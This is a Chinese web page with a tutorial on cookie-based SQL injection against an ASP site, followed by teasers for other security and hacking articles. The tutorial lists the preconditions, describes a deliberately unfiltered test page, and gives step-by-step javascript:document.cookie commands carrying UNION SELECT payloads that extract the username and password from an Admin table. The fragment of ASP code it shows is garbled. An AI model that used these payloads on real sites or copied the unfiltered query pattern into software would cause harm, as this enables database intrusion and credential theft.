如何利用cookie将数据库的安全降低?cookie降低安全的前提条件是什么?
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。
cookie值是连接后才保存到本机的,也就是关IE后.
前提条件:一、网站没有过滤cookie方式的注入。
二、需事前了解数据库的管理员表段名,计算一下注入文件数据库查询语句在数据库中的列数。
打开数据库,找到Product这个表名,计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password,呵呵没有注入文件,我们可以自己构造一个测试方便大家的理解。
构造如下简单注入ASP,当然我没作什么严格的过滤,也就是接受任何方式的提交。.
//调用数据库连接文件
")
else
%>
//反回指针处的内容,选取的字段与管理员的用户密码类型要相同
找前图中的ID=55
构造联合查询语句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6,2分别用username、password替换
来试试cookie注入。找个目标,注入点结构与前面相近就不再分析了,仅过滤了post与get注入.
步骤一:重新打开IE,先连接到需注入的网站http://127.0.0.1/nf, 也就是去除前面的链接值。注意:不要直接在前面图中的链接处操作,可以会不成功噢。
步骤二:清空地址处IE,再次在地址中加入如下
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp
步骤四:重复步骤一.注意此步骤必需操作,很多人失败就在这里。
步骤五:清空地址处IE,再次在地址中如下代码
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
步骤六、再次清空地址处IE。http://127.0.0.1/nf/ProductShow.asp
好了全文结束。
路由器怎么设置才可以抵挡ddos攻击?
一、路由器设置实现DDoS防御之DDoS攻击原理讨论在分布式“拒绝服务”(DDoS)的攻击过程中,一群恶意的主机或被恶意主机感染的主机将向受攻击的服务器发送大量的数据。在这种情况下,靠近网络边缘的网络节点将会
详情2018-01-03 18:06:06责编:llp 来源:驱动管家物联网是什么?物联网时代该怎么保护你的隐私?
什么是物联网,我百度了好多地方,觉得答案实在太官方了。我觉得物联网就是把身边的一切连在一起,包括你曾经认为和网搭不上边的东西,沙发、电视、电饭煲,这一切都被网络连在一起。以后恐怕连战争,都是黑客之
详情2018-01-11 19:49:18责编:llp 来源:驱动管家u盘中毒怎么清除?清除U盘病毒可以用这三招
当我们遇到“Autorun inf”文件,只要我们双击闪盘分区图标时,该病毒就会通过“Autorun inf”文件中的设置来自动激活病毒,然后将“Autorun inf”文件同时拷贝到其他分区,导致其他分区都无法用双击鼠标的方法打
详情2018-01-19 08:52:15责编:llp 来源:驱动管家什么是织梦内容管理系统?织梦内容管理系统有什么漏洞?
影响版本: Dedecms 3 1漏洞描述: 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用户最多的PHP类CMS系统,在经历了二年多的发展,目前的版本无论在功能,
详情2018-01-16 15:26:45责编:llp 来源:驱动管家如何破解电脑开机密码?简单一招就可以破解电脑开机密码
碰到电脑就像玩一会,但是,电脑开机需要密码怎么办?现在教你小小一招巧解任何电脑的开机密码。无需任何工具,无需放电。任何电脑当开机需要密码时,只需将机箱打开,把里面的声卡或其它任何一个零件拔下来,然
详情2018-01-14 18:07:50责编:llp 来源:驱动管家dns欺骗是什么?dns欺骗有什么条件和限制?
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“
详情2018-01-02 16:11:39责编:llp 来源:驱动管家网页加密怎么做?如何给我们的网页加上一把密码锁?
现在专业性的网站越来越多,许多网友们都在网上建立起了自己的小家。不过辛辛苦苦制作的网页被人拿去改头换面却是件非常痛心的事,所以大家都想保护自己独创的作品,为自己的网页上把锁,今天就让我带大家了解一
详情2018-01-17 15:55:01责编:llp 来源:驱动管家使用wifi时,如何保证自己的上网安全?做到这几点就可以了
如果智能手机不能上网,那和辣鸡有什么本质上的区别?让我们这些“低头族”如何获取新闻资讯、听歌看视频、玩游戏呢?但运营商那么抠,每个月的流量就那么点。想要玩的溜,免费Wi-Fi就得用!但这么多年的现实教育
详情2018-02-01 10:05:10责编:llp 来源:驱动管家木马程序也可以换图标?木马程序换图标的步骤
我也不费话了因为没有工夫所以只是简单的写了一下希望学会!准备工具:1 黑洞2001(也可以用别的)2 文件捆绑机exe2to1(黑洞作者的新作品)3 窃图精灵1 04 noskynet或黑毒克星注意这些软件到我的网站都可以下载到!好了
详情2018-02-04 14:58:52责编:llp 来源:驱动管家wireshark使用教程 wireshark监测无线网络的步骤
计算机安全始终是一个让人揪心的问题,网络安全则有过之而无不及。无线网络是黑客们最爱下手的一个目标。这完全是由于机器与机器之间没有物理链接:所有信号都以无线电波的方式传送。要加密安全,首要步骤之一就
详情2018-01-17 20:08:34责编:llp 来源:驱动管家
- 如何利用cookie将数据库的安全降低?cookie降低安全的前提条件是什么?
- C4D中的山体模型是怎么做出来的?C4D山体模型制作方法
- skype无法登陆怎么办?skype无法登陆解决办法
- 摄像机机芯的组成有哪些?摄像机机芯的介绍
- 不同型号的松下网络摄像机详细介绍
- 怎么设置虚拟内存?电脑提示内存不足教你这样设置虚拟内存
- 路由器防火墙设置技巧:路由器过滤不良信息的方法
- 步步高xplay3s的卖点是什么?步步高xplay3s配置如何?
- vivo x9有哪几种颜色?vivo x9有没有黑色呢?
- 电脑全屏截图黑屏的原因是什么?如何修改注册表来解决这个问题?
- 告诉大家如何在你的网络上廉价的追踪入侵者?
- iebook是一款什么样的软件?iebook教程使用
- msn聊天记录在哪儿看?msn聊天记录保存在哪儿了?
- 家用网络摄像机那个品牌比较好?家用网络摄像机的推荐
- 远距离摄像机那个品牌比较好?远距离摄像机介绍
- win7屏幕保护设置?win7电脑怎么设置屏幕保护
- 电脑待机怎么设置?设置电脑待机的方法步骤
- 三星s5如何设置节目效果?三星s5在哪里设置节目效果?
- 荣耀7什么时候出?预测六月底发布,价格1999
- 鼠标右键菜单怎样进行整理?鼠标右键菜单管理方法是什么?